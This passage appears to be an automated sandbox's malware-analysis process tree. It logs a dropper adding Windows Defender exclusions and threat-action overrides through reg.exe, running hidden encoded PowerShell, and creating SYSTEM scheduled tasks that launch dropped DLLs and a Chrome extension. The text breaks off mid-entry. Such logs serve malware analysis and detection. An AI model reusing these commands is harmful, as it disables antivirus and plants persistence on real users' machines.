                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1096
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1548
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:3040
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:2876
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:1952
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:1584
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:1212
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:2180
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1308
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1592
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:2832
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:2908
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:3012
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:2556
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:3000
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:2104
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2292
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2204
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2632
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:2608
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2848
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "geIHXerhR" /SC once /ST 00:21:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2752
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "geIHXerhR"
                                                                                                                                            3⤵
                                                                                                                                              PID:2324
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "geIHXerhR"
                                                                                                                                              3⤵
                                                                                                                                                PID:2428
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1476
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2224
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1436
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:936
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:45:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe\" 0c /bIFgdidNa 385121 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2456
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2232
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 600
                                                                                                                                                          3⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:1604
                                                                                                                                                      • C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe
                                                                                                                                                        C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe 0c /bIFgdidNa 385121 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:2028
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1068
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2712
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2200
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1148
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2000
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:516
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:876
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2936
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1488
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:436
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2916
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3052
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:2944
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1608
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:768
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:3036
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:2252
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1748
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:596
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2240
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:2876
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:2596
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:2968
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2104
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1092
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:420
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3052
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2096
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1784
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\GIsfsbD.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1608
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1872
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:30:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll\",#1 /PONsdidJpV 385121" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1164
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2060
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:700
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1512
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:2736
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 385121
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1212
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 385121
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:1140
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2452
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {3F9049A4-E151-4328-955F-2EFE76B778DB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1100
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:980
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1212
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2292
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2496
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
